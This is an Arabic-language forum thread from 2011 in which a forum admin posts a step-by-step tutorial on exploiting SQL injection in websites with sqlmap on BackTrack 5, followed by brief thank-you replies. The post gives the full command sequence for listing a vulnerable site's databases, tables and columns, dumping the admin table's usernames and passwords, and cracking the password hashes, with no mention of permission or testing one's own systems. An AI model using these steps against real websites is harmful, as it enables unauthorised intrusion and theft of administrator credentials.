العلم نهضة الامة الإسلامية



مرحبا بك عزيزي الزائر في منتديات ثقافة 2009 شعارنا العلم نهضة الأمة الإسلامية . المرجوا منك أن تعرّف بنفسك و تدخل المنتدى معنا. إن لم يكن لديك حساب بعد, نتشرف بدعوتك لإنشائه و شكرا لك ,المدير العام:محمد تابليت . santa


العلم نهضة الامة الإسلامية

شعارنا العلم معرفة شعارنا العلم نهضة الأمة الإسلامية
 
الرئيسيةالبوابةاليوميةمكتبة الصورس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخول

.: عدد زوار المنتدى :.

بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
المواضيع الأخيرة
أفضل 10 أعضاء في هذا المنتدى
mohamed10060
 
issame1995
 
salah
 
michaal
 
خالدوه
 
abdo
 
malik
 
fio123
 
fouad_tablit
 
leader
 

شاطر | 
 

  حصريا أحتراف أستغلال SQL عبر نظام BackTrack 5 الرائع

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
mohamed10060
Admin
Admin
avatar

الأوسمة :
الهواية :
المهنة :
المزاج :

الجنس : ذكر الدولة : الجزائر

عدد المساهمات : 201
نقاط : 926
السٌّمعَة : 3
تاريخ التسجيل : 15/09/2009
العمر : 22
الموقع : حاسي مسعود
تعاليق على المنتدى : منتدى من الروائع

مُساهمةموضوع: حصريا أحتراف أستغلال SQL عبر نظام BackTrack 5 الرائع    الأحد يوليو 10, 2011 3:06 pm

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته

::===================::

اليوم أقدم لكم موضوع حصري حصري لأبعد الحدود وانا نزلته بمناسبة

::===================::

سبب طرح الموضوع

أعلان حبيبنا وأستاذنا ( Back Track ) عن دوري حقن sql وعز الله اني احترت في وصف هالأداري الرائع وفي نفس الوقت عشان المشتركين في الدورة يستفيدون
ايضا لأن ( Back Track ) صديقنا اسمه نفس أسم نظام باك تراك
يعني أهداء خاص له وللجميع



::===================::

طبعا الموضوع باين من عنوانه هو أحتراف أستغلال ثغرات SQL عبر نظام backtrack 5

::===================::

نبدء على بركة الله

أولا نشغل الباك تراك

ونختار من القائمة كما هي موضحه بالصورة

الأن بتظهر لك هذي الواجهه الرسومية



الأن كذا تمام هذه الأداه تغنيك عن اي برنامج او اي برمجة وهي فيها كل الأدوات الي تحتاجها
تقدر تكتب help ثم انتر عشان يعطيك جميع الأوامر لهذي الأداه الجبارة
الأن تكتب

python sqlmap.py -u xxx --dbs


xxx = الموقع المصاب بـ sql


الأن إظغط انتر وانتظر ثواني وبتظهر لك النتيجة مثل كذا




مثل ما شفت تلقائيا عرف اصدار القاعده وأظهر لنا القواعد تبع الموقع
الأن أكيد انت من النظرة الأولى بتعرف القاعده المطلوبة من أسمها
الأن بنعطيه أمر أظهار الجداول في القاعده الي بنختارها

python sqlmap.py -u xxx -D ddd --tables


xxx = الموقع المصاب
ddd = اسم القاعده الي بنطلع جداولها


الأن أظغط انتر وشوف النتيجة في الصورة الي تحت




مثل ما شفت طلع لنا الجداول الي داخل القاعده ومن ظمن الجداول جدول الـ الأدمن

الأن هدفنا عرض الأعمدة الي داخل الجدول عن طريق الأمر

python sqlmap.py -u xxx -D ddd -T ttt --columns



xxx = الموقع المصاب
ddd = اسم القاعده الي بنطلع جداولها
ttt = الجدول الي بنعرض الأعمده الي داخله مثل ( admin )


مثل الصورة الي تحت



الأن اظغط انت وشوف النتيجه


حلو ظهر لنا عمود اليوزر + عمود الباسورد

الأن يا طويل العمر نبغى نعرف الجدول الي داخل


انا ظهر لي عمود اسمه username شوف الأمر حتى نعرض محتواه

python sqlmap.py -u xxx -D ddd -T ttt -C ccc --dump



xxx = الموقع المصاب
ddd = اسم القاعده الي بنطلع جداولها
ttt = الجدول الي بنعرض الأعمده الي داخله
ccc = العمود الي بنظهر محتواه


مثل ما هو موضح بالصورة الي تحت


الأن أظغط انتر وشوف النتيجه اكيد بتعجبك




الأن أنا طلعت محتوى العمود username بنفس الأمر نطلع الباس

فقط نستبدل username بـ password


python sqlmap.py -u xxx -D ddd -T ttt -C ccc --dump



xxx = الموقع المصاب
ddd = اسم القاعده الي بنطلع جداولها
ttt = الجدول الي بنعرض الأعمده الي داخله
ccc = العمود الي بنظهر محتواه



مثل مافي الصورة



أظغط أنتر وشوف النتيجه



ا
اذا طلعت لك كما في الصورة فهذا طبيعي لان الباسورد مشفر
وهنا يقولك هل تريد ان تجرب فك الهاش
اذا كنت تريد فك الهاش اكتب Y
اذا ما تبي تفك الهاش اكتب N

واظغط انتر


الحمد لله طلعنا الباس

وهذي هي فكرة استغلال ثغرات SQL عبر نظام BACKTACK 5 اتمنى انكم استفدتو منها
ولو اني مقصر في الشرح لاكن اعذروني من زمان ما سويت شرح


--============ أهداء الى ============--
ozil mohamed

والي نسيته
يع
ذرنا تحياتي لكم

_________________التوقيع:
رائــع : تصحيح أخطاء الغير
الأروع : أن لايتحول اقتناص الأخطاء إلى متعة شخصية لديك
رائــع : أن تقدم نصيحة لمن تحب
الأروع : ألا تتحول النصيحة إلى جرح للمشاعر

معاك يالخذرة معاك يدزاير معاك يسعدان

الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://thakafa2009.mam9.com
mohamed.ozil
نائب المدير
نائب المدير
avatar

الأوسمة :
الهواية :
المهنة :
المزاج :

الجنس : ذكر الدولة : الجزائر

عدد المساهمات : 3
نقاط : 7
السٌّمعَة : 0
تاريخ التسجيل : 11/06/2011

مُساهمةموضوع: رد: حصريا أحتراف أستغلال SQL عبر نظام BackTrack 5 الرائع    الإثنين يوليو 11, 2011 3:07 am

موضوع رائع جاري التجربة و انشاء الله كل راح يستفيد
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://www.hackrs4you.ga2h.com/vb
mohamed10060
Admin
Admin
avatar

الأوسمة :
الهواية :
المهنة :
المزاج :

الجنس : ذكر الدولة : الجزائر

عدد المساهمات : 201
نقاط : 926
السٌّمعَة : 3
تاريخ التسجيل : 15/09/2009
العمر : 22
الموقع : حاسي مسعود
تعاليق على المنتدى : منتدى من الروائع

مُساهمةموضوع: رد: حصريا أحتراف أستغلال SQL عبر نظام BackTrack 5 الرائع    الإثنين يوليو 11, 2011 2:55 pm

thnxxxxxxxxxxxxxx for visite Embarassed

_________________التوقيع:
رائــع : تصحيح أخطاء الغير
الأروع : أن لايتحول اقتناص الأخطاء إلى متعة شخصية لديك
رائــع : أن تقدم نصيحة لمن تحب
الأروع : ألا تتحول النصيحة إلى جرح للمشاعر

معاك يالخذرة معاك يدزاير معاك يسعدان

الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://thakafa2009.mam9.com
 
حصريا أحتراف أستغلال SQL عبر نظام BackTrack 5 الرائع
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
العلم نهضة الامة الإسلامية :: ::الأقسام الخاصة بالاختراق:: :: ركن الإختراق بالباك تراك Back Track-
انتقل الى: